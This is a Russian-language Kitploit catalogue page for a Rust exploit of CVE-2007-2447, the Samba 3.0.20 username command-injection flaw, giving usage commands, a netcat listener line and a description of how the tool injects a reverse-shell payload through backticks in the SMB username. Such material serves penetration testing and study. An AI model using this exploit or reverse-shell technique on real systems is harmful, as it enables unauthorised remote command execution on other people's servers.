Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2007-2447 — Автономная реализация эксплойта CVE-2007-2447 на Rust, нацеленная на Samba smbd 3.0.20-Debian. | Kitploit
Инструменты/GitHubGitHub/nika0x38/cve-2007-2447
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

Автономная реализация эксплойта CVE-2007-2447 на Rust, нацеленная на Samba smbd 3.0.20-Debian.

Репозиторий
111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Samba CVE-2007-2447

Rust Security

Автономная реализация эксплойта CVE-2007-2447 на Rust, нацеленного на Samba smbd 3.0.20-Debian.

Описание уязвимости

CVE-2007-2447 — это уязвимость внедрения команд в версиях Samba с 3.0.0 по 3.0.25rc3. Уязвимость существует в функции SamrChangePassword(), которая не выполняет должную очистку пользовательского ввода, что позволяет злоумышленникам выполнять произвольные команды через метасимволы оболочки в поле имени пользователя при SMB-аутентификации.

Предварительные требования

  • Установленный Rust в системе
  • Целевая система с уязвимой версией Samba
  • Наличие netcat на целевой системе (обычно установлен по умолчанию)

Использование

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

Пример

root@kitploit:~
# Запускаем слушатель netcat
nc -lvnp 4444

# Запускаем эксплойт
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

Параметры

  • --lhost: IP-адрес вашей атакующей машины
  • --lport: Порт для приёма обратного соединения
  • --target: IP-адрес целевой машины

Как это работает

  1. Формирует payload обратного соединения netcat непосредственно в коде
  2. Внедряет payload в поле имени пользователя SMB с помощью обратных кавычек
  3. Отправляет некорректный запрос SMB Session Setup на порт 445
  4. Использует внедрение команд в обработку имени пользователя в Samba
  5. Выполняет payload обратного соединения на целевой системе

Возможности

  • Автономность: Не требует внешних зависимостей, таких как Metasploit
  • Портативность: Работает в любой системе с установленным Rust
  • Быстродействие: Без запуска внешних процессов

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Используйте ответственно и только на системах, которыми вы владеете или на которые имеете явное разрешение.

Скачать инструмент